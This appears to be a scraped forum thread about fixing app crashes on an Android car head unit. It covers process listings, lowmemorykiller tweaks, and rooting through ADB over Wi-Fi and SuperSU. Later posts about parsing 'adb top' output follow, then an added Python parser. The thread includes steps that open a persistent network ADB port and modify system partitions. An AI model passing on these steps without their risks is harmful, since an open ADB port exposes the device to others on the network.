root 139 2 0 0 worker_thr 00000000 S kworker/u8:4
root 140 2 0 0 irq_thread 00000000 S irq/283-jack_ir
root 141 2 0 0 irq_thread 00000000 S irq/284-button_
root 142 2 0 0 rescuer_th 00000000 S f_mtp
root 143 2 0 0 rescuer_th 00000000 S setExposure_que
root 144 2 0 0 rescuer_th 00000000 S measurement_que
root 145 2 0 0 rescuer_th 00000000 S bat_hal-0
root 148 1 2540 124 poll_sched f7712b80 S /sbin/ueventd
root 151 2 0 0 worker_thr 00000000 S kworker/0:1H
root 152 2 0 0 worker_thr 00000000 S kworker/1:1H
root 153 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p14
root 154 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 157 2 0 0 worker_thr 00000000 S kworker/2:1H
root 159 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p15
root 160 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 164 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p13
root 165 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
logd 166 1 14856 2436 sigsuspend f76e3b80 S /system/bin/logd
root 167 1 11644 912 hrtimer_na f7675b80 S /system/bin/vold
root 172 2 0 0 kauditd_th 00000000 S kauditd
root 182 1 2932 304 SyS_epoll_ f7758b80 S /sbin/healthd
root 183 1 4308 708 SyS_epoll_ f772ab80 S /system/bin/lmkd
system 184 1 4116 660 binder_thr f7744b80 S /system/bin/servicemanager
system 185 1 61108 3840 SyS_epoll_ f770fb80 S /system/bin/surfaceflinger
root 186 1 2284 0 hrtimer_na f77dfb80 S /sbin/watchdogd
radio 187 1 5648 660 SyS_epoll_ f779cb80 S /system/bin/rpcServer
shell 193 1 4328 672 n_tty_read f7731b80 S /system/bin/sh
radio 194 1 16412 940 hrtimer_na f775bb80 S /system/bin/rild
radio 195 1 16156 800 hrtimer_na f76cbb80 S /system/bin/rild
root 196 1 17884 1468 hrtimer_na f773fb80 S /system/bin/netd
root 198 1 4936 968 __skb_recv f773bb80 S /system/bin/debuggerd
drm 199 1 25160 1428 binder_thr f773bb80 S /system/bin/drmserver
media 200 1 139544 3632 binder_thr f7705b80 S /system/bin/mediaserver
root 201 1 4216 1028 unix_strea f76afb80 S /system/bin/installd
keystore 204 1 7692 1144 binder_thr f7766b80 S /system/bin/keystore
system 205 1 7960 780 binder_thr f76fbb80 S /system/bin/pluginservice
system 206 1 4276 684 atdev_ioct f7768b80 S /system/bin/startIpcsd
radio 207 1 6536 632 fmdev_fifo f76ecb80 S /system/bin/fmd
gps 208 1 4328 724 sigsuspend f7678b80 S /system/bin/sh
root 209 1 827376 32696 poll_sched f772eb80 S zygote
system 210 1 7364 1056 binder_thr f775cb80 S /system/bin/gatekeeperd
root 211 1 4240 616 hrtimer_na f7738b80 S /system/xbin/perfprofd
root 214 1 8100 1076 poll_sched f76fdb80 S /system/vendor/bin/crashlogd
root 215 1 6560 944 devkmsg_re f773bb80 S /vendor/bin/log-watch
root 218 2 0 0 worker_thr 00000000 S kworker/3:1H
root 221 1 3876 212 __skb_recv f76dab80 S daemonsu:mount:master
root 229 2 0 0 kjournald2 00000000 S jbd2/mmcblk0p5-
root 230 2 0 0 rescuer_th 00000000 S ext4-rsv-conver
root 247 1 7228 416 __skb_recv f76dab80 S daemonsu:master
root 252 2 0 0 rescuer_th 00000000 S cfg80211
gps 256 208 21528 2016 futex_wait f731fb80 S /system/bin/lbsd
radio 259 1 8300 732 nvmdev_ioc f76e9b80 S /system/bin/nvm_useragent
radio 262 1 15060 628 hrtimer_na f7783b80 S /system/bin/rpc-daemon
shell 263 1 10392 352 poll_sched f7761b80 S /sbin/adbd
root 327 2 0 0 irq_thread 00000000 S irq/289-gnss_wa
root 329 2 0 0 irq_thread 00000000 S irq/291-gnss_er
root 395 2 0 0 irq_thread 00000000 S irq/293-wlan_ir
root 532 1 4328 716 sigsuspend f7675b80 S /system/bin/sh
root 541 532 5316 860 __skb_recv f76dab80 S /system/vendor/bin/logcatext
system 575 209 898040 83068 SyS_epoll_ f772eb80 S system_server
root 701 2 0 0 mvpipe_dev 00000000 S VUSB_SE_FE_LINK
root 702 2 0 0 n_tty_read 00000000 S VUSB_SE_FE_LINK
root 703 2 0 0 msleep 00000000 D VUSB_SE_FE_MODE
root 736 2 0 0 rescuer_th 00000000 S vs-2
wifi 765 1 8788 2172 poll_sched f7509b80 S /system/bin/wpa_supplicant
media_rw 787 167 7896 912 inotify_re f7747b80 S /system/bin/sdcard
radio 800 209 696084 36216 SyS_epoll_ f772eb80 S com.android.phone
u0_a21 817 209 733912 46884 SyS_epoll_ f772eb80 S com.android.systemui
u0_a13 831 209 706448 53000 SyS_epoll_ f772eb80 S com.android.launcher
root 851 2 0 0 worker_thr 00000000 S kworker/3:2
media_rw 987 167 8156 716 inotify_re f778db80 S /system/bin/sdcard
u0_a76 1081 209 668624 25904 SyS_epoll_ f772eb80 S com.android.smspush
root 1123 2 0 0 worker_thr 00000000 S kworker/u9:2
u0_a9 1190 209 668636 26560 SyS_epoll_ f772eb80 S com.android.externalstorage
u0_a22 1336 209 953040 30864 SyS_epoll_ f772eb80 S com.google.android.googlequicksearchbox:interactor
u0_a43 1350 209 703316 48884 SyS_epoll_ f772eb80 S com.android.inputmethod.latin
system 1385 209 672148 28020 SyS_epoll_ f772eb80 S android.microntek.canbus
u0_a10 1417 209 845516 74952 SyS_epoll_ f772eb80 S com.google.android.gms.persistent
root 1431 1 4328 560 sigsuspend f772eb80 S /system/bin/sh
u0_a8 1438 209 681944 38376 SyS_epoll_ f772eb80 S android.process.media
u0_a10 1492 209 685848 32932 SyS_epoll_ f772eb80 S com.google.process.gapps
root 1497 1431 85112 360 poll_sched 40190422 S /system/bin/adb-ec
root 1503 2 0 0 rescuer_th 00000000 S vs-0
root 1530 1 4328 712 poll_sched f76adb80 S /system/bin/sh
u0_a10 1619 209 1046992 102860 SyS_epoll_ f772eb80 S com.google.android.gms
u0_a10 1708 209 825364 50108 SyS_epoll_ f772eb80 S com.google.android.gms.unstable
bluetooth 1752 209 719936 30080 SyS_epoll_ f772eb80 S com.android.bluetooth
root 1777 2 0 0 irq_thread 00000000 S irq/286-btif_mu
root 1778 2 0 0 irq_thread 00000000 S irq/288-btip_wa
root 1846 247 6196 416 __skb_recv f76dab80 S daemonsu:10087
u0_a60 2067 209 671340 30384 SyS_epoll_ f772eb80 S com.microntek.radio
system 2120 209 668872 29716 SyS_epoll_ f772eb80 S com.intel.soundprofile
u0_a39 2171 209 674544 31632 SyS_epoll_ f772eb80 S com.hct.screenbutton
u0_a40 2188 209 670856 27088 SyS_epoll_ f772eb80 S android.rockchip.update.service
u0_a37 2393 209 668748 25720 SyS_epoll_ f772eb80 S com.microntek.bluetooth
root 2893 247 7228 388 __skb_recv f76dab80 S daemonsu:10086
root 3090 1 649972 19408 futex_wait f76ceb80 S app_process
shell 3349 263 4328 1348 sigsuspend f7736b80 S /system/bin/sh
shell 3437 3349 3876 1164 poll_sched f778eb80 R su
root 3441 247 9292 484 __skb_recv f76dab80 S daemonsu:0
root 3443 3441 9548 944 poll_sched f76dab80 S daemonsu:0:3437
root 3549 3443 4328 1576 sigsuspend f7653b80 S tmp-mksh
root 3772 2 0 0 worker_thr 00000000 S kworker/1:0
root 3776 2 0 0 worker_thr 00000000 S kworker/0:0
u0_a85 3782 209 835136 72712 SyS_epoll_ f772eb80 S info.kfsoft.android.MemoryIndicator
shell 3913 263 4148 1364 __skb_recv f76e6b80 S logcat
root 3933 2 0 0 worker_thr 00000000 S kworker/u8:1
system 3972 209 726988 64328 SyS_epoll_ f772eb80 S com.android.settings
root 4013 2 0 0 worker_thr 00000000 S kworker/1:2
root 4014 2 0 0 worker_thr 00000000 S kworker/0:2
u0_a7 4019 209 669884 27748 SyS_epoll_ f772eb80 S com.android.defcontainer
root 4065 2 0 0 worker_thr 00000000 S kworker/u9:1
u0_a17 4069 209 934572 110068 SyS_epoll_ f772eb80 S com.android.vending
root 4115 2 0 0 worker_thr 00000000 S kworker/2:0
root 4136 2 0 0 worker_thr 00000000 S kworker/3:1
root 4180 3549 4224 1140 0 f776cb80 R ps
That's way over my head!
V5.11 is much better, but it won't play music, or nav sounds randomly, but the radio sounds always work?
I've put it back on V6.0.1 to get the music back, but nav randomly shuts down again.
I'm back to square one.
The seller has agreed to shipping back to Germany for full refund though.
It might be a good option!
OK, next steps now I've not identified a specific task killer is looking into Dalvik cache and VM settings, as perhaps these are too lean and causing the apps to run out and die like that (Still no message seeming to indicate this though).
Anyone any thoughts on tweaking these settings on a head unit? I'll grab my current values and my suggested ones for reference shortly.
--EDIT--
Ah, Dalvik was pre-4.0 and these are 6.0 Marshmallow so do the dalvik cache tweaks still do anything or do I need to look for ART tweaks instead?
still on 5.11 here, looks like disabling 'media audio' under bluetooth settings on my phone allows the head unit to route the music player to the speakers again, not sure why it was letting the radio audio through and not the music audio?
Am trying to get the Marshmallow release working so unfortunately not wanting to revert back to 5 or earlier.
However I'm making progress on 6.x
I believe it's the lowmemorykiller/ART that's getting in the way here, perhaps being set to be too aggressive at larger memory sizes.
I've installed a minfree memory kernel lowmemorykiller (it's easier than tweaking the params from adb shell) - App is "AutoKiller Memory Optimizer". I've not used any of its other functions as this was the main one I wanted.
So after tweaks I'm running with:
Code:
cat /sys/module/lowmemorykiller/parameters/minfree
2754,5508,7344,13770,16065,18360
So far, running navigation (Google Maps) and then swapping back and forward to music and back, maps didn't close itself at all.
For some reason, music was stopping when switching to maps but I think that's more of an audio routing issue to look into, but so far it doesn't appear to be aggressively killing applications that have focus.
Some more logs that are interesting:
Code:
11-27 18:52:28.530 598 611 I art : Background partial concurrent mark sweep GC freed 21273(1447KB) AllocSpace objects, 3(60KB) LOS objects, 26% free, 11MB/15MB, paused 5.265ms total 141.023ms
11-27 18:52:31.112 6084 6095 I art : Background sticky concurrent mark sweep GC freed 2542(492KB) AllocSpace objects, 0(0B) LOS objects, 0% free, 11MB/11MB, paused 25.845ms total 89.939ms
11-27 18:52:31.185 6084 6095 I art : Background partial concurrent mark sweep GC freed 2011(210KB) AllocSpace objects, 0(0B) LOS objects, 24% free, 12MB/16MB, paused 11.725ms total 71.330ms
-- then after also launching music --
11-27 18:57:16.780 6235 6246 I art : Background sticky concurrent mark sweep GC freed 24160(1164KB) AllocSpace objects, 9(1440KB) LOS objects, 18% free, 12MB/15MB, paused 1.401ms total 112.708ms
11-27 18:57:16.833 6084 6095 I art : Background partial concurrent mark sweep GC freed 27088(1805KB) AllocSpace objects, 30(1196KB) LOS objects, 7% free, 49MB/53MB, paused 3.415ms total 310.197ms
I've also discovered some additional items when debugging, relating to standby, memory and the microntek applications but I'll post to a separate thread as will try and keep this thread on-track.
I'll report back after more extensive testing.
FIX/SOLVED
OK, after 30 minute drive this morning, I've had no app crashes or exits at all, ran maps with navigation and had FM radio on all the way, switched between apps using hard and soft back/keys, no problems, so I'm going to call this one the fix!
So the steps:
Root it
Install "AutoKiller Memory Optimizer" by MobiWIA Kft.
In AutoKiller switch everything OFF but then use the CHANGE button on main screen, set it to MODERATE (Or experiment with different ones)
Remember that needs set after full reboot (standby is fine) unless you add it to autostart at boot.
@Qwertyco I'd go back up to 6 and try the above, might solve the issues for you!
Cheers Andy.
After playing with 5.11 for a few days, it's become apparent that it has sound routing problems whenever there's a Bluetooth connection to my phone. (Moto G5 on Android 7). The only way I can get music or nav sound (radio is always OK!) is to have the connection as 'Internet sharing only', no phone or contacts or A2DP.
It also needs regular rebooting to achieve this, as returning from sleep sometimes messes with the sound routing as well.
I'm going to try going back to 6.0.1, and try the new HIZPO 2017.09.15 update file first before I try your fix.
I updated back to 6.0.1, and tried the HIZPO 2017.09.15 update file, and it just aborted the update after 5 seconds.
I'll have a look at it and try again another time.
I'm back, not used the car for a while, so not had a chance to play.
Andy, what's the rooting procedure, if you don't mind?
Hi, no problem same here as the car has been dead for a while here unfortunately!
I've written a lot of the info up at my blog http://www.thebmwz3.co.uk/2017/11/hizpo-android-car-head-unit-mtcdxrc.html
But rooting is:
* Go into factory settings in Settings menu
* type adbon into the password box and click OK
Try at that point, you should be able to get adb working over wifi. If not, install a terminal app to the head unit and then type "setprop persist.adb.tcp.port 5555" and then reboot the unit. You should then be able to adb over wifi.
Then you can root it using the root procedure at https://hvdwolf.github.io/Joying-RootAssistant/rooting.html and I used the file SuperSU-Joying-Intel-v2.82SR1-patch2.zip which worked first time.
Thanks to Andy and others, I've gone back to Android 6.01 and rooted the thing, followed Andy's tips and it seems to be running fairly smoothly for the first time ever.
I've done all this with the unit on the workbench (coffee table) as it's cold outside!
I can't test the sat nav indoors, but it seems to start up and keep running now.
My mission is to get it to do everything I want it to do before it goes back in the car.
Currently struggling with getting it to auto-tether to my phone Bluetooth, and getting apps to autostart at boot.
I can't seem to find any mention of autorun in the software, and the many autorun apps I've tried don't autorun at boot!
Hey m8, glad you're getting there. It's been in my car for quite a few months now, running smoothly!
So, for the auto-tethering bluetooth I've done this:
Get BluetoothTethering.apk from 'doitright' at https://forum.xda-developers.com/an...elopment/bluetooth-settings-launcher-t3504526 (Don't get blueballs, we don't need it) and follow the instructions to install it onto our headunits (i.e. the bit in the terminal/code block where you write it to /system/priv-app/). I've followed those instructions and my phone (HTC One M8) and car bring their bluetooth up and tether perfectly each time now.
Autorun at boot/wake-up is still a little challenging, however the trick is the one that BluetoothTethering.apk uses above, installing the app into priv-app lets it keep running in the background/at wakeup so the key is there, I've just never bothered to really go further into it.
To do the low-mem-killer settings, since our units don't reboot often I just do that manually, as there isn't an rc.local or bootup script that I've located that I can chain those commands into, but then again I've not tried very hard as it's working for me now!
I use Waze, Google Maps, Music, Radio all swapping between them without crashes. Sure it's not the fastest thing in the world but it works
Thanks Andy, I'll have a go at the tethering app.
The two apps I want to autostart are a night screen dimmer and a speed sensitive volume controller. The priv-app location may well solve that!
I'll report back.....
Those sound interesting apps, which ones are you using as I'm always on the lookout for decent addons!
Also just be careful having more and more apps running in the background, we've not got a huge amount of RAM/Processor to play with!
Well, the Bluetooth is now auto connecting, many thanks again to Andy.
After an abortive attempt on my Windows 10 laptop, I finally got the ADB to work from my old Windows 7 PC over WiFi.
Playing about with these two at the moment:
This:
https://play.google.com/store/apps/details?id=net.codechunk.speedofsound&hl=en
and this:
https://play.google.com/store/apps/details?id=com.urbandroid.lux&hl=en
I just realised I seem to be working without using the "AutoKiller Memory Optimizer", as if it doesn't autostart on boot, I've not been manually starting it?
Thanks @Qwertyco I'll take a look at those two apps.
The autokiller optimizer, once it's run once, those settings will stick until a full hard reboot/power disconnect, not just standby when you turn ignition off, so chances are that's why it's kept working for you so far.
Update:
After doing all the stuff Andy suggested, it's running much better now, and rarely does anything random or unexpected anymore.
It's still annoying me in various ways though, the main thing being that every time it starts up the music player plays the first track of the first album EVERY TIME! This happens to be AC/DC - Hells Bells, which is wearing a bit thin now. It rarely does a 'quick resume' and almost always takes a full boot time to start playing music.
Any ideas out there?
Hello, I decided that I will analyse running processes and figure out why my battery is usually not lasting more than half a day. For that I figured maybe running
adb shell top
will work. I could send this to a file and later make some analysis of the results. The problem is that it looks like this
Code:
800%cpu 10%user 0%nice 17%sys 772%idle 1%iow 0%irq 0%sirq 0%host
←[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS ←[0m
28364 system 20 0 2.2G 83M 61M S 15.3 2.4 1:08.09 com.samsung.and+
31155 u0_a193 20 0 2.1G 69M 40M S 4.6 2.0 6:00.62 com.facebook.or+
30834 shell 20 0 11M 4.3M 3.3M R 2.3 0.1 0:00.85 top
3246 system 12 -8 1.6G 14M 11M S 2.3 0.4 249:18.01 surfaceflinger
26367 system 10 -10 2.7G 106M 89M S 1.3 3.0 1:14.78 com.samsung.and+
22515 root 20 0 0 0 0 S 1.3 0.0 0:03.16 [kworker/u16:4]
3825 system 10 -10 3.4G 182M 81M S 1.0 5.2 572:07.02 system_server
971 root 20 0 0 0 0 S 1.0 0.0 151:39.30 [kswapd0]
29785 u0_a209 20 0 1.7G 67M 52M S 0.3 1.9 0:03.20 com.microsoft.o+
21383 root 0 -20 0 0 0 S 0.3 0.0 0:00.84 [kworker/1:0H]
20039 u0_a213 20 0 2.9G 56M 47M S 0.3 1.6 9:15.59 com.digibites.a+
3132 logd 30 10 31M 13M 836K S 0.3 0.3 25:29.47 logd
679 root 20 0 0 0 0 S 0.3 0.0 5:34.54 [kcompactd0]
13 root RT 0 0 0 0 S 0.3 0.0 2:00.01 [migration/1]
30749 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/u17:2]
30699 u0_a379 20 0 2.2G 98M 82M S 0.0 2.8 0:00.95 org.androworks.+
30670 advmodem 20 0 2.2G 74M 65M S 0.0 2.1 0:00.33 com.samsung.and+
30661 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/0:0H]
30652 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/7:2H]
30651 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/5:0H]
The process names are cut. Is there a way to make the top command write wider columns? Linux top knows -w but adb top does not.
Seems like running -b makes it wide enough but it shows all processes and not just the top few which would be enough.
I can see that it's also formatted wrong and the column headers don't match the values below. Jeez...
Hello
I need to get the CPU usage from my device (Lenovo Tab M8, Android OS) and send it via HTTP request to my server.
I test it with my smartphone.
I found the app macrodroid, which can automatically send data via HTTP request. So the first step is done.
After a long search I found the "adb shell" app, so I can test my shell command. So the second step is done.
I want to use the command "top -n 1" because my devices are not rooted and I always got "permission denied" with other commands.
The top command shows an output.
THERE IS THE PROBLEM:
If I use the top command on my smartphone, I don't get a correct output. The %idle is always the same as %cpu.
If I connect my phone to my PC and run it in the Windows command prompt, it shows the correct data.
For example:
The output on the phone:
Code:
[s[999C[999B[6n[u[H[J[?25l[H[J[s[999C[999B[6n[uTasks: 2 total, 1 running, 1 sleeping, 0 stopped, 0 zombie Mem: 3.5G total, 3.4G used, 129M free, 39M buffers Swap: 2.0G total, 1.6G used, 396M free, 1.1G cached800%cpu 0%user 0%nice 0%sys 800%idle 0%iow 0%irq 0%sirq 0%host[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS [0m[1m 7831 u0_a357 10 -10 36M 3.7M 3.0M R 4.0 0.1 0:00.00 top -n 1[m 7717 u0_a357 10 -10 33M 2.9M 2.4M S 0.0 0.0 0:00.01 sh[?25h[0m[1000;1H[K[?25h[?25h[0m[1000;1H[K
Output on the PC:
Code:
Mem: 3.5G total, 3.4G used, 93M free, 40M buffers
Swap: 2.0G total, 1.6G used, 380M free, 1.0G cached
800%cpu 82%user 0%nice 124%sys 594%idle 0%iow 0%irq 0%sirq 0%host
←[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS ←[0m
2305 u0_a357 10 -10 25G 258M 164M S 64.7 7.1 23:29.96 com.arlosoft.ma+
517 system 5 -15 1.7G 20M 14M S 44.1 0.5 207:08.58 surfaceflinger
←[mm 7844 shell 20 0 36M 4.3M 3.3M R 23.5 0.1 0:00.10 top -n 1
983 system 18 -2 12G 273M 130M S 17.6 7.5 595:30.94 system_server
←[mm 276 root RT 0 0 0 0 R 17.6 0.0 53:19.28 [decon0]
7843 root 20 0 0 0 0 S 11.7 0.0 0:00.20 [kworker/0:1]
488 system -3 -15 506M 4.3M 3.6M S 11.7 0.1 45:01.04 android.hardwar+
7385 root 0 -20 0 0 0 S 8.8 0.0 0:02.53 [kworker/u17:3]
7807 root 20 0 0 0 0 S 2.9 0.0 0:00.90 [kworker/3:2]
7542 root 20 0 0 0 0 S 2.9 0.0 0:00.00 [kworker/4:0]
2291 root 20 0 0 0 0 S 2.9 0.0 0:02.05 [kworker/u16:2]
2188 root 20 0 0 0 0 S 2.9 0.0 0:02.93 [kworker/u16:0]
7088 u0_a237 10 -10 7.4G 159M 75M S 2.9 4.3 95:05.07 com.samsung.and+
1365 radio 20 0 5.7G 43M 30M S 2.9 1.2 40:36.23 com.android.pho+
496 wifi 20 0 63M 2.8M 2.6M S 2.9 0.0 6:31.76 android.hardwar+
7757 u0_a239 20 0 4.9G 93M 79M S 0.0 2.5 0:00.32 com.samsung.and+
7745 u0_a62 20 0 4.9G 88M 74M S 0.0 2.4 0:00.17 com.sec.android+
7717 u0_a357 10 -10 33M 2.9M 2.4M S 0.0 0.0 0:00.01 sh
7628 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kbase_event]
←[?25h←[0m←[1000;1H←[K←[?25h←[?25h←[0m←[1000;1H←[Kstarlte:/ $ 0
How can I get this output on my device???
Is it so difficult or is my question not good?
:-( I think there is no solution....
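Added example, not part of any post in the thread: a parser for the `top -n 1` text shown in the captures above that strips the terminal escape sequences and pulls out the CPU summary line and the busiest processes, for use wherever the captured text ends up (for instance the server receiving the HTTP request). It assumes the capture still contains the raw ESC byte (or the `←` a Windows console prints in its place); `parse_top`, its `limit` parameter and the sample capture are constructed for illustration.

```python
import re

# CSI escape sequences: ESC (or the "←" a Windows console prints in its place),
# "[", optional parameters, one final letter.
CSI = re.compile(r"(?:\x1b|←)\[[0-9;?]*[A-Za-z]")
SUMMARY = re.compile(r"(\d+)%(cpu|user|nice|sys|idle|iow|irq|sirq|host)\b")
# Columns: PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ ARGS
ROW = re.compile(r"(?:^|\s)(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)"
                 r"\s+([A-Za-z])\s+([\d.]+)\s+([\d.]+)\s+([\d:.]+)\s+(.+?)\s*$")

def parse_top(raw, limit=3):
    """Return (summary dict, busy % across all cores, busiest `limit` rows)."""
    # A sequence is sometimes the only thing separating two rows, so each one
    # becomes a line break instead of being deleted.
    text = CSI.sub("\n", raw)
    cpu, rows = {}, []
    for line in text.splitlines():
        if not cpu and "%cpu" in line:
            cpu = {name: int(val) for val, name in SUMMARY.findall(line)}
            continue
        m = ROW.search(line)
        if m:
            rows.append({"pid": int(m[1]), "user": m[2],
                         "cpu": float(m[9]), "args": m[12]})
    rows.sort(key=lambda r: r["cpu"], reverse=True)
    busy = None
    if cpu.get("cpu"):  # e.g. 800 on an 8-core device
        busy = round(100.0 * (cpu["cpu"] - cpu["idle"]) / cpu["cpu"], 1)
    return cpu, busy, rows[:limit]

# Constructed capture (not real device output): rows glued together as in the
# on-device capture, with only escape sequences between them.
SAMPLE = (
    "Mem: 3.5G total, 3.4G used, 93M free, 40M buffers\n"
    "800%cpu 80%user 0%nice 120%sys 600%idle 0%iow 0%irq 0%sirq 0%host"
    "\x1b[7m  PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS \x1b[0m"
    "\x1b[1m 7831 u0_a357 10 -10 36M 3.7M 3.0M R 4.0 0.1 0:00.00 top -n 1"
    "\x1b[m 517 system 5 -15 1.7G 20M 14M S 44.1 0.5 207:08.58 surfaceflinger"
    "\x1b[m 276 root RT 0 0 0 0 R 17.6 0.0 53:19.28 [decon0]\x1b[?25h\x1b[0m"
)

if __name__ == "__main__":
    summary, busy, top_rows = parse_top(SAMPLE)
    print(f"busy {busy}% of {summary['cpu']}%")
    for r in top_rows:
        print(r["pid"], r["user"], r["cpu"], r["args"])
```

The busy figure is normalised to 0-100 across all cores, so a summary reading 800%cpu with 800%idle comes out as 0.0 rather than looking like full load.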